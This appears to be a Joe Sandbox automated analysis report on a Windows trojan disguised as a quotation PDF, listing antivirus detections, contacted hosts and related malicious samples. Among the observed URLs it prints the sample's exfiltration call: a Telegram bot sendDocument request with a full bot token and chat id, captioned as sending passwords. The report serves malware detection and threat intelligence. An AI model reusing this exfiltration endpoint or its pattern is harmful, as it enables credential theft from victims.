            REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe46%VirustotalBrowse
            REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe24%ReversingLabsWin32.Trojan.Garf
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dll0%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.19.174
            truefalse
              high
              drive.usercontent.google.com
              142.250.181.1
              truefalse
                high
                reallyfreegeoip.org
                104.21.67.152
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    158.101.44.242
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://drive.usercontent.google.com/&xxsREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2685919507.00000000049AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.orgREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035175000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035119000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/botREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://translate.google.com/translate_a/element.jsREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://drive.google.com/REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004938000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://reallyfreegeoip.orgREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://reallyfreegeoip.orgREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontent.google.com/REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004998000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2685919507.00000000049AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.orgREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035287000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035175000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F67000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035119000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://apis.google.comREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://drive.google.com/NkREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004938000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://checkip.dyndns.comREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035287000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035175000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035119000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://nsis.sf.net/NSIS_ErrorErrorREQUEST FOR QUOATION AND PRICES 0910775_pdf.exefalse
                                                            high
                                                            http://api.telegram.orgREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035175000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035119000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://drive.usercontent.google.com/SREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004998000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2685919507.00000000049AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://reallyfreegeoip.org/xml/REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    149.154.167.220
                                                                    api.telegram.orgUnited Kingdom
                                                                    62041TELEGRAMRUfalse
                                                                    142.250.181.1
                                                                    drive.usercontent.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    104.21.67.152
                                                                    reallyfreegeoip.orgUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    193.122.130.0
                                                                    unknownUnited States
                                                                    31898ORACLE-BMC-31898USfalse
                                                                    158.101.44.242
                                                                    checkip.dyndns.comUnited States
                                                                    31898ORACLE-BMC-31898USfalse
                                                                    172.217.19.174
                                                                    drive.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1575710
                                                                    Start date and time:2024-12-16 08:42:44 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 7m 9s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:5
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@3/8@7/6
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 95%
                                                                    • Number of executed functions: 155
                                                                    • Number of non-executed functions: 110
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    TimeTypeDescription
                                                                    02:44:49API Interceptor558x Sleep call for process: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe modified
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    149.154.167.220SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, XmrigBrowse
                                                                        RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                          3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                            Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      888.exeGet hashmaliciousLuca StealerBrowse
                                                                                        104.21.67.152SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      malware.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                        Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            193.122.130.0SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            Malzeme #U0130stek Formu_12102024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            jXN37dkptv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            UBS20240190101.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            BL-100410364195.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            checkip.dyndns.comSWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 193.122.130.0
                                                                                                            file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                            • 193.122.130.0
                                                                                                            Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 132.226.8.169
                                                                                                            77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 193.122.6.168
                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            reallyfreegeoip.orgSWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.67.152
                                                                                                            Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.67.152
                                                                                                            77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 172.67.177.134
                                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 172.67.177.134
                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.67.152
                                                                                                            hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            api.telegram.orgSWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                            • 149.154.167.220
                                                                                                            3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            TELEGRAMRUfile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                            • 149.154.167.99
                                                                                                            file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                            • 149.154.167.99
                                                                                                            lem.exeGet hashmaliciousVidarBrowse
                                                                                                            • 149.154.167.99
                                                                                                            Setup.msiGet hashmaliciousVidarBrowse
                                                                                                            • 149.154.167.99
                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                            • 149.154.167.99
                                                                                                            SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                            • 149.154.167.99
                                                                                                            file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, XmrigBrowse
                                                                                                            • 149.154.167.220
                                                                                                            file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                                                            • 149.154.167.99
                                                                                                            RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                            • 149.154.167.220
                                                                                                            CLOUDFLARENETUSwebhook.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 162.159.138.232
                                                                                                            givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                            • 104.21.84.67
                                                                                                            clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                            • 172.67.187.200
                                                                                                            https://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baaGet hashmaliciousUnknownBrowse
                                                                                                            • 104.26.10.61
                                                                                                            https://keepsmiling.co.in/front/indexxxx.html?em=NT43NUs6MllJO0ZdVTkzKSA8NzlDOkcgTjhWXU0=Get hashmaliciousUnknownBrowse
                                                                                                            • 104.21.89.91
                                                                                                            file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                            • 104.21.79.7
                                                                                                            http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450Get hashmaliciousUnknownBrowse
                                                                                                            • 172.67.41.229
                                                                                                            1.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 1.8.62.108
                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                            • 104.21.79.7
                                                                                                            Setup.msiGet hashmaliciousVidarBrowse
                                                                                                            • 104.21.52.25
                                                                                                            ORACLE-BMC-31898USarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 147.154.242.4
                                                                                                            SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 193.122.130.0
                                                                                                            file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                            • 193.122.130.0
                                                                                                            Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 140.204.52.53
                                                                                                            77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 193.122.6.168
                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            Non_disclosure_agreement.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 192.29.14.118
                                                                                                            ORACLE-BMC-31898USarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 147.154.242.4
                                                                                                            SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 193.122.130.0
                                                                                                            file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                            • 193.122.130.0
                                                                                                            Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 140.204.52.53
                                                                                                            77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 193.122.6.168
                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            Non_disclosure_agreement.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 192.29.14.118
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adSWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.67.152
                                                                                                            Tvl72VM6PM.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.67.152
                                                                                                            Tvl72VM6PM.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.67.152
                                                                                                            Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.67.152
                                                                                                            77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.67.152
                                                                                                            Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                                                                                                            • 104.21.67.152
                                                                                                            CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                                                                            • 104.21.67.152
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0ejignesh.exeGet hashmaliciousQuasarBrowse
                                                                                                            • 149.154.167.220
                                                                                                            skibidi.exeGet hashmaliciousQuasarBrowse
                                                                                                            • 149.154.167.220
                                                                                                            vanilla.exeGet hashmaliciousQuasarBrowse
                                                                                                            • 149.154.167.220
                                                                                                            givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                            • 149.154.167.220
                                                                                                            clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                            • 149.154.167.220
                                                                                                            c2.htaGet hashmaliciousXWormBrowse
                                                                                                            • 149.154.167.220
                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                            • 149.154.167.220
                                                                                                            SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            TD2HjoogPx.dllGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            wmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            c2.htaGet hashmaliciousXWormBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            lem.exeGet hashmaliciousVidarBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            Setup.msiGet hashmaliciousVidarBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dllSWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              O0rhQM49FL.exeGet hashmaliciousUnknownBrowse
                                                                                                                O0rhQM49FL.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      K8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                        K8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                          JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
